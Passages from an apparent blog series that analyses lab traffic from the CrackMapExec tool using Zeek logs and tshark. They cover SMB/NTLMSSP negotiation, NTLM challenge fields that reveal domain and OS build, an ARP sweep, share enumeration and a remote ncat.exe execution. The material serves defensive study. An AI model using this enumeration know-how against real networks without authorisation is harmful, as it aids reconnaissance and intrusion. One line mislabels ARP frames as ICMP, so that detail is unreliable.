conn.log  ntlm.log  packet_filter.log  reporter.log  weird.log

Looking at the connection log we see:


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p service < conn.log
ts uid id.orig_h id.orig_p id.resp_h id.resp_p service
2019-04-18T04:32:43-0400 C4i28G49xYh3RgkUbk 10.0.0.100 53492 10.0.0.105 445 -
2019-04-18T04:32:43-0400 CbDALpm71nEf5WN99 10.0.0.100 53494 10.0.0.105 445 -
2019-04-18T04:32:43-0400 Czx60F4xYofLMUpac 10.0.0.100 53496 10.0.0.105 445 -
2019-04-18T04:32:43-0400 CC2Zuq3Lh1qJpt4jO1 10.0.0.100 33962 10.0.0.105 135 -
2019-04-18T04:32:43-0400 CL7Bw42tDtZRMUSafb 10.0.0.100 37794 10.0.0.105 49666 -
2019-04-18T04:32:43-0400 C25qjC29efnwRR6B0j 10.0.0.100 33962 10.0.0.105 135 dce_rpc,ntlm
2019-04-18T04:32:43-0400 Ca5Xb049R1iQXNZP25 10.0.0.100 53496 10.0.0.105 445 gssapi,ntlm,smb
2019-04-18T04:32:43-0400 Ci2xjs2FpCPzEALQg2 10.0.0.100 53492 10.0.0.105 445 gssapi,ntlm,smb
2019-04-18T04:32:43-0400 CYZqa7DXxkMdfqmI4 10.0.0.100 53494 10.0.0.105 445 gssapi,ntlm,smb
2019-04-18T04:32:43-0400 CYmG7f1Ms7ioIwXGxk 10.0.0.105 49666 10.0.0.100 37794 dce_rpc,ntlm
2019-04-18T04:32:12-0400 C4dmGj2zkDyNYyKxOb 10.0.0.3 56736 239.255.255.250 1900 -

Looking at the ntlm.log we see ..


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name < ntlm.log 
ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name
2019-04-18T04:32:43-0400 Ci2xjs2FpCPzEALQg2 10.0.0.100 53492 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T04:32:43-0400 CYZqa7DXxkMdfqmI4 10.0.0.100 53494 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T04:32:43-0400 Ca5Xb049R1iQXNZP25 10.0.0.100 53496 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T04:32:43-0400 C25qjC29efnwRR6B0j 10.0.0.100 33962 10.0.0.105 135 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T04:32:43-0400 CYmG7f1Ms7ioIwXGxk 10.0.0.105 49666 10.0.0.100 37794 - - SECNIK-2K19 SECNIK-2K19.securitynik.local


What I find interesting, is that in this case there is no username being shown as in the previous example. Anyhow, at this point there is nothing else for us to correlate with.

Let's wrap this up by now looking to see what bro provides us with when we provide Zeek the pcap associated with the execution of a remote program. In this case "ncat.exe".


root@securitynik:~/cme# bro --readfile cme-ncat.pcap
root@securitynik:~/cme# ls *.log
conn.log  ntlm.log  packet_filter.log  reporter.log  weird.log


Let's take a look at the conn.log file


root@securitynik:~/cme# bro-cut -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration < conn.log 
2019-04-18T23:05:33-0400 C0Casf2VeL577K74qk 10.0.0.100 57948 10.0.0.105 445 tcp - -
2019-04-18T23:05:33-0400 CuwHqr4mVIMRzgUth4 10.0.0.100 57950 10.0.0.105 445 tcp - -
2019-04-18T23:05:33-0400 CtqyKz1eoOzoQgGEG6 10.0.0.100 57952 10.0.0.105 445 tcp - -
2019-04-18T23:05:33-0400 Cwaqh53GrL1rn5f304 10.0.0.100 60342 10.0.0.105 135 tcp - -
2019-04-18T23:05:33-0400 CPHI0w4Ri0Df01Gug2 10.0.0.100 43388 10.0.0.105 49666 tcp - -
2019-04-18T23:05:33-0400 CAD9fo1xfxXPla2Wn2 10.0.0.105 49666 10.0.0.100 43388 tcp dce_rpc,ntlm 3.012401
2019-04-18T23:05:36-0400 CDx2941eRrmxWipQK9 10.0.0.105 50602 10.0.0.100 443 tcp - 0.144933
2019-04-18T23:05:33-0400 CbVXzF2OWiOED64yvb 10.0.0.100 57952 10.0.0.105 445 tcp smb,gssapi,ntlm 19.982751
2019-04-18T23:05:33-0400 CX4uc32KRN2MVEZI5a 10.0.0.100 60342 10.0.0.105 135 tcp dce_rpc,ntlm 19.943066
2019-04-18T23:05:53-0400 CTMorz2v9B31jQio2j 10.0.0.100 43388 10.0.0.105 49666 tcp - 0.001947
2019-04-18T23:05:33-0400 CYCCkxVoiEZiyU6Ih 10.0.0.100 57948 10.0.0.105 445 tcp smb,gssapi,ntlm 20.044038
2019-04-18T23:05:33-0400 CmEnbE1FCGYbB5gMV 10.0.0.100 57950 10.0.0.105 445 tcp smb,gssapi,ntlm 20.021675
2019-04-18T23:05:56-0400 CymFsuDGc1MuGq0p7 10.0.0.105 50602 10.0.0.100 443 tcp - 12.295573

Let's once again look at the "ntlm.log" and see what we get.


root@securitynik:~/cme# bro-cut -c -d ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name < ntlm.log 
ts uid id.orig_h id.orig_p id.resp_h id.resp_p username domainname server_nb_computer_name server_dns_computer_name
2019-04-18T23:05:33-0400 CYCCkxVoiEZiyU6Ih 10.0.0.100 57948 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T23:05:33-0400 CmEnbE1FCGYbB5gMV 10.0.0.100 57950 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T23:05:33-0400 CbVXzF2OWiOED64yvb 10.0.0.100 57952 10.0.0.105 445 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T23:05:33-0400 CAD9fo1xfxXPla2Wn2 10.0.0.105 49666 10.0.0.100 43388 - - SECNIK-2K19 SECNIK-2K19.securitynik.local
2019-04-18T23:05:33-0400 CX4uc32KRN2MVEZI5a 10.0.0.100 60342 10.0.0.105 135 - - SECNIK-2K19 SECNIK-2K19.securitynik.local

While we have some information there, there is not much for us to correlate.

Ok. That's it for this series.


Refereces:
https://www.zeek.org/
https://www.zeek.org/documentation/faq.html#why-isnt-zeek-producing-the-logs-i-expect-a-note-a
https://stackoverflow.com/questions/36859896/bro-doesnt-log-outgoing-http-requests

Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis

Having Fun with CrackMapExec - Packet Analysis with tshark

Let's now take a look at the packets which are generated when crackmapexec is executed on our network

Here is the tcpdump filter which was configured to capture the traffic. The "-w" will change as I will have each crackmapexec command in its own pcap.

root@securitynik:~# tcpdump -nnvvi eth0 'not port (9997 or 8089 or 8191 or 8000 or 8065 or 68 or 67)' -w cme-scan.pcap

Now that we have the file named "cme-scan.pcap", let's perform our packet analysis on this.

As always, when running tshark (or wireshark) one of the first things we should do is look at the protocol statistics. We can achieve this as follows:

root@securitynik:~# tshark -n -r cme-scan.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:1570 bytes:72502
  arp                                    frames:1521 bytes:64188
  ip                                     frames:49 bytes:8314
    tcp                                  frames:48 bytes:8244
      nbss                               frames:28 bytes:6940
        smb                              frames:3 bytes:381
        smb2                             frames:25 bytes:6559
    icmp                                 frames:1 bytes:70
===================================================================

Let's look into the TCP traffic by first looking at the conversations


root@securitynik:~# tshark -n -r cme-scan.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:34564           <-> 10.0.0.105:445                   9      1598      10      1166      19      2764    10.223046000        10.5146
10.0.0.100:39670           <-> 10.0.0.3:445                     6      1669       8      1030      14      2699     7.135418000         0.0369
10.0.0.100:50874           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     7.174715000         0.0219
10.0.0.100:50838           <-> 10.0.0.2:445                     0         0       1        74       1        74     7.135206000         0.0000
================================================================================

Interestingly in the results returned from crackmapexec, there are 3 hosts in the results. However, above we see 4 conversations with port 445. Let's remove the bottom one as it returns a total of 74 bytes, while the top 3 has over 1000 bytes.

To make this a bit easier on ourselves, let's leverage a tshark filter that only focuses on the first conversation with source port 34564 and destination port 445.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.port == 34564) and (tcp.port == 445)"
  388  10.223046   10.0.0.100 → 10.0.0.105   TCP 74 34564 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2851720854 TSecr=0 WS=128
  391  10.223405   10.0.0.105 → 10.0.0.100   TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  392  10.223423   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
  395  10.224501   10.0.0.100 → 10.0.0.105   SMB 127 Negotiate Protocol Request
  399  10.225553   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  400  10.225566   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
  420  10.231080   10.0.0.100 → 10.0.0.105   SMB2 164 Negotiate Protocol Request
  421  10.231694   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  444  10.238197   10.0.0.100 → 10.0.0.105   SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
  446  10.238929   10.0.0.105 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  447  10.243642   10.0.0.100 → 10.0.0.105   SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
  448  10.244629   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  449  10.247201   10.0.0.100 → 10.0.0.105   SMB2 126 Session Logoff Request
  450  10.247610   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
  452  10.279539   10.0.0.105 → 10.0.0.100   TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
  453  10.279577   10.0.0.100 → 10.0.0.105   TCP 66 34564 → 445 [ACK] Seq=595 Ack=1017 Win=32512 Len=0 SLE=945 SRE=1017
 1565  20.735709   10.0.0.100 → 10.0.0.105   TCP 54 34564 → 445 [FIN, ACK] Seq=595 Ack=1017 Win=32512 Len=0
 1566  20.736058   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
 1567  20.737597   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0

Now that we have the above, we have an insight into what the communication looks like. We can see the TCP 3-way handshake has been completed and then we see the SMB session negotiated and processed, followed by the TCP connection being gracefully terminated.

Now if we were to look into the "Session Setup Response Message" for the NTLMSSP_NEGOTIATE (Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE), as shown in record number 446, we should be able to gather information into how crackmapexec was able to determine the operating system, etc. Let's take a look at specific fields in the "Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE" packet to bring some clarity into this. Let's also adjust our tshark filter, to now only look at traffic coming back from the 3 devices found, while ignoring the ICMP frame. We will revisit the 1521 frames which show up in the protocol hierarchy shortly, but work with me for now.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.srcport == 445) && !(icmp)"
   11   7.135744     10.0.0.3 → 10.0.0.100   TCP 66 445 → 39670 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
   14   7.137411     10.0.0.3 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
   39   7.145265     10.0.0.3 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
   63   7.154134     10.0.0.3 → 10.0.0.100   SMB2 401 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
   87   7.163947     10.0.0.3 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
  111   7.172290     10.0.0.3 → 10.0.0.100   TCP 60 445 → 39670 [RST, ACK] Seq=1328 Ack=579 Win=0 Len=0
  122   7.174930   10.0.0.103 → 10.0.0.100   TCP 66 445 → 50874 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  125   7.182170   10.0.0.103 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
  128   7.185537   10.0.0.103 → 10.0.0.100   SMB2 506 Negotiate Protocol Response
  130   7.189042   10.0.0.103 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  132   7.194414   10.0.0.103 → 10.0.0.100   SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
  134   7.196617   10.0.0.103 → 10.0.0.100   TCP 60 445 → 50874 [RST, ACK] Seq=1336 Ack=579 Win=0 Len=0
  391  10.223405   10.0.0.105 → 10.0.0.100   TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
  399  10.225553   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  421  10.231694   10.0.0.105 → 10.0.0.100   SMB2 306 Negotiate Protocol Response
  446  10.238929   10.0.0.105 → 10.0.0.100   SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
  448  10.244629   10.0.0.105 → 10.0.0.100   SMB2 139 Session Setup Response
  450  10.247610   10.0.0.105 → 10.0.0.100   SMB2 126 Session Logoff Response
  452  10.279539   10.0.0.105 → 10.0.0.100   TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
 1566  20.736058   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
 1567  20.737597   10.0.0.105 → 10.0.0.100   TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0

As we can see from above, we have a few response packets from the hosts at 10.0.0.3, 10.0.0.103 and 10.0.0.105. These matches with what crackmapexec found so far. let's now look into the specific fields to show how it learned the information it displayed. Before looking at the specific fields, let's take record number 446 and expand it to see some of the fields.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(frame.number == 446)" -T text -V
Frame 446: 409 bytes on wire (3272 bits), 409 bytes captured (3272 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr  7, 2019 23:12:40.690090000 EDT
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1554693160.690090000 seconds
    [Time delta from previous captured frame: 0.000516000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 10.238929000 seconds]
    Frame Number: 446
    Frame Length: 409 bytes (3272 bits)
    Capture Length: 409 bytes (3272 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:nbss:smb2:gss-api:spnego:ntlmssp]
Ethernet II, Src: 08:00:27:d1:1c:e7, Dst: 08:00:27:ac:14:9c
    Destination: 08:00:27:ac:14:9c
        Address: 08:00:27:ac:14:9c
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 08:00:27:d1:1c:e7
        Address: 08:00:27:d1:1c:e7
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.0.105, Dst: 10.0.0.100
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 395
    Identification: 0x515e (20830)
    Flags: 0x4000, Don't fragment
        0... .... .... .... = Reserved bit: Not set
        .1.. .... .... .... = Don't fragment: Set
        ..0. .... .... .... = More fragments: Not set
        ...0 0000 0000 0000 = Fragment offset: 0
    Time to live: 128
    Protocol: TCP (6)
    Header checksum: 0x9342 [validation disabled]
    [Header checksum status: Unverified]
    Source: 10.0.0.105
    Destination: 10.0.0.100
Transmission Control Protocol, Src Port: 445, Dst Port: 34564, Seq: 505, Ack: 342, Len: 355
    Source Port: 445
    Destination Port: 34564
    [Stream index: 3]
    [TCP Segment Len: 355]
    Sequence number: 505    (relative sequence number)
    [Next sequence number: 860    (relative sequence number)]
    Acknowledgment number: 342    (relative ack number)
    0101 .... = Header Length: 20 bytes (5)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Nonce: Not set
        .... 0... .... = Congestion Window Reduced (CWR): Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window size value: 8211
    [Calculated window size: 2102016]
    [Window size scaling factor: 256]
    Checksum: 0x10ec [unverified]
    [Checksum Status: Unverified]
    Urgent pointer: 0
    [SEQ/ACK analysis]
        [This is an ACK to the segment in frame: 444]
        [The RTT to ACK the segment was: 0.000732000 seconds]
        [iRTT: 0.000377000 seconds]
        [Bytes in flight: 355]
        [Bytes sent since last PSH flag: 355]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.015883000 seconds]
        [Time since previous frame in this TCP stream: 0.000732000 seconds]
    TCP payload (355 bytes)
NetBIOS Session Service
    Message Type: Session message (0x00)
    Length: 351
SMB2 (Server Message Block Protocol version 2)
    SMB2 Header
        Server Component: SMB2
        Header Length: 64
        Credit Charge: 1
        NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016)
        Command: Session Setup (1)
        Credits granted: 1
        Flags: 0x00000001, Response
            .... .... .... .... .... .... .... ...1 = Response: This is a RESPONSE
            .... .... .... .... .... .... .... ..0. = Async command: This is a SYNC command
            .... .... .... .... .... .... .... .0.. = Chained: This pdu is NOT a chained command
            .... .... .... .... .... .... .... 0... = Signing: This pdu is NOT signed
            .... .... .... .... .... .... .000 .... = Priority: This pdu does NOT contain a PRIORITY1
            ...0 .... .... .... .... .... .... .... = DFS operation: This is a normal operation
            ..0. .... .... .... .... .... .... .... = Replay operation: This is NOT a replay operation
        Chain Offset: 0x00000000
        Message ID: Unknown (2)
        Process Id: 0x00000000
        Tree Id: 0x00000000
        Session Id: 0x000048000000003d
        Signature: 00000000000000000000000000000000
        [Response to: 444]
        [Time from request: 0.000732000 seconds]
    Session Setup Response (0x01)
        StructureSize: 0x0009
            0000 0000 0000 100. = Fixed Part Length: 4
            .... .... .... ...1 = Dynamic Part: True
        Session Flags: 0x0000
            .... .... .... ...0 = Guest: False
            .... .... .... ..0. = Null: False
            .... .... .... .0.. = Encrypt: False
        Blob Offset: 0x00000048
        Blob Length: 279
        Security Blob: a18201133082010fa0030a0101a10c060a2b060104018237...
            GSS-API Generic Security Service Application Program Interface
                Simple Protected Negotiation
                    negTokenTarg
                        negResult: accept-incomplete (1)
                        supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider)
                        responseToken: 4e544c4d53535000020000001600160038000000358289e2...
                        NTLM Secure Service Provider
                            NTLMSSP identifier: NTLMSSP
                            NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
                            Target Name: SECURITYNIK
                                Length: 22
                                Maxlen: 22
                                Offset: 56
                            Negotiate Flags: 0xe2898235, Negotiate 56, Negotiate Key Exchange, Negotiate 128, Negotiate Version, Negotiate Target Info, Negotiate Extended Security, Target Type Domain, Negotiate Always Sign, Negotiate NTLM key, Negotiate Seal, Negotia
                                1... .... .... .... .... .... .... .... = Negotiate 56: Set
                                .1.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Set
                                ..1. .... .... .... .... .... .... .... = Negotiate 128: Set
                                ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set
                                .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set
                                .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set
                                .... ..1. .... .... .... .... .... .... = Negotiate Version: Set
                                .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set
                                .... .... 1... .... .... .... .... .... = Negotiate Target Info: Set
                                .... .... .0.. .... .... .... .... .... = Request Non-NT Session: Not set
                                .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set
                                .... .... ...0 .... .... .... .... .... = Negotiate Identify: Not set
                                .... .... .... 1... .... .... .... .... = Negotiate Extended Security: Set
                                .... .... .... .0.. .... .... .... .... = Target Type Share: Not set
                                .... .... .... ..0. .... .... .... .... = Target Type Server: Not set
                                .... .... .... ...1 .... .... .... .... = Target Type Domain: Set
                                .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set
                                .... .... .... .... .0.. .... .... .... = Negotiate 0x00004000: Not set
                                .... .... .... .... ..0. .... .... .... = Negotiate OEM Workstation Supplied: Not set
                                .... .... .... .... ...0 .... .... .... = Negotiate OEM Domain Supplied: Not set
                                .... .... .... .... .... 0... .... .... = Negotiate Anonymous: Not set
                                .... .... .... .... .... .0.. .... .... = Negotiate NT Only: Not set
                                .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set
                                .... .... .... .... .... ...0 .... .... = Negotiate 0x00000100: Not set
                                .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set
                                .... .... .... .... .... .... .0.. .... = Negotiate Datagram: Not set
                                .... .... .... .... .... .... ..1. .... = Negotiate Seal: Set
                                .... .... .... .... .... .... ...1 .... = Negotiate Sign: Set
                                .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set
                                .... .... .... .... .... .... .... .1.. = Request Target: Set
                                .... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set
                                .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set
                            NTLM Server Challenge: 67f26f829961c6cf
                            Reserved: 0000000000000000
                            Target Info
                                Length: 168
                                Maxlen: 168
                                Offset: 78
                                Attribute: NetBIOS domain name: SECURITYNIK
                                    Target Info Item Type: NetBIOS domain name (0x0002)
                                    Target Info Item Length: 22
                                    NetBIOS Domain Name: SECURITYNIK
                                Attribute: NetBIOS computer name: SECNIK-2K19
                                    Target Info Item Type: NetBIOS computer name (0x0001)
                                    Target Info Item Length: 22
                                    NetBIOS Computer Name: SECNIK-2K19
                                Attribute: DNS domain name: securitynik.local
                                    Target Info Item Type: DNS domain name (0x0004)
                                    Target Info Item Length: 34
                                    DNS Domain Name: securitynik.local
                                Attribute: DNS computer name: SECNIK-2K19.securitynik.local
                                    Target Info Item Type: DNS computer name (0x0003)
                                    Target Info Item Length: 58
                                    DNS Computer Name: SECNIK-2K19.securitynik.local
                                Attribute: Timestamp
                                    Target Info Item Type: Timestamp (0x0007)
                                    Target Info Item Length: 8
                                    Timestamp: Apr  7, 2019 23:12:40.658449900 EDT
                                Attribute: End of list
                                    Target Info Item Type: End of list (0x0000)
                                    Target Info Item Length: 0
                            Version 10.0 (Build 17763); NTLM Current Revision 15
                                Major Version: 10
                                Minor Version: 0
                                Build Number: 17763
                                NTLM Current Revision: 15

From above, we literally broke out all the fields for this packet. As you can see, a lot of this information which crackmapexec saw is already visible. Let's now prepare to wrap this part of it up by extracting those fields and presenting them in a more user-friendly manner.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(ntlmssp.messagetype == 0x00000002)" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e ntlmssp.identifier -e ntlmssp.challenge.target_name -e ntlmssp.challenge.target_info.nb_domain_name -e ntlmssp.version.major -e ntlmssp.version.build_number -E header=y
ip.src tcp.srcport ip.dst tcp.dstport ntlmssp.identifier ntlmssp.challenge.target_name ntlmssp.challenge.target_info.nb_domain_name ntlmssp.version.major ntlmssp.version.build_number
10.0.0.3 445 10.0.0.100 39670 NTLMSSP SECURITYNIK-SYS SECURITYNIK-SYS 10 17763
10.0.0.103 445 10.0.0.100 50874 NTLMSSP SECURITYNIK-WIN SECURITYNIK-WIN 10 16299
10.0.0.105 445 10.0.0.100 34564 NTLMSSP SECURITYNIK SECURITYNIK 10 17763

Obviously, you should now try to extract some of the other fields that I did not include.

Before we go, if we remember when we looked at the protocol hierarchy, above there were ARP packets. Let's see what we can gather from these.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" | wc --lines
1521

From above, it looks like we have 1521 ICMP messages. Let's see what is really going on here. To help us understand what is going on, let's once again, look into the fields and parse the information of interest out.


root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" -T fields -e arp.src.hw_mac  -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y | more
arp.src.hw_mac  arp.src.proto_ipv4 arp.dst.proto_ipv4 arp.opcode
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ec:69:d7 10.0.0.103  10.0.0.102 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.1 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.4 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.5 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.6 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.7 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.8 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.9 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.10 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.49 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.50 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.51 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.52 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.53 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.54 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.55 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.56 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.57 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.58 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.59 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.11 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.12 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.13 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.14 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.15 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.16 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.17 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.18 1
08:00:27:ac:14:9c 10.0.0.100  10.0.0.21 1

.... <truncated for brevity> ....

Let's now look at what the packets look like as CrackMapExec enumerates the shares

Let's once again start with looking at the protocol hierarchy

root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:487 bytes:131203
  arp                                    frames:5 bytes:300
  ip                                     frames:482 bytes:130903
    tcp                                  frames:482 bytes:130903
      nbss                               frames:394 bytes:115138
        smb                              frames:8 bytes:1016
        smb2                             frames:386 bytes:114122
          tcp.segments                   frames:2 bytes:2764
===================================================================

From above we see both SMB and SMB2 conversations. I take that to mean that the conversation probably started on SMB1 the negotiated to SMB2.

Let's look into the conversations.

root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.100:35710           <-> 10.0.0.105:445                  88     32754      95     19205     183     51959     4.701908000         1.3409
10.0.0.100:52026           <-> 10.0.0.103:445                  77     32785      88     19170     165     51955     4.702229000         1.3245
10.0.0.100:41024           <-> 10.0.0.3:445                    13      3322      17      3681      30      7003     4.778967000         1.2455
10.0.0.100:35716           <-> 10.0.0.105:445                  14      2952      15      2945      29      5897     4.797176000         1.2259
10.0.0.100:52032           <-> 10.0.0.103:445                  13      3074      15      2883      28      5957     5.162347000         0.8619
10.0.0.100:35708           <-> 10.0.0.105:445                   8      1512      10      1154      18      2666     4.658157000         1.3651
10.0.0.100:41016           <-> 10.0.0.3:445                     7      1729       8      1030      15      2759     4.657942000         0.1189
10.0.0.100:52018           <-> 10.0.0.103:445                   6      1677       8      1030      14      2707     4.657751000         0.0437
================================================================================

Let's do like the previous instance and look into one of the conversations. Let's take the first one with source port 35710.


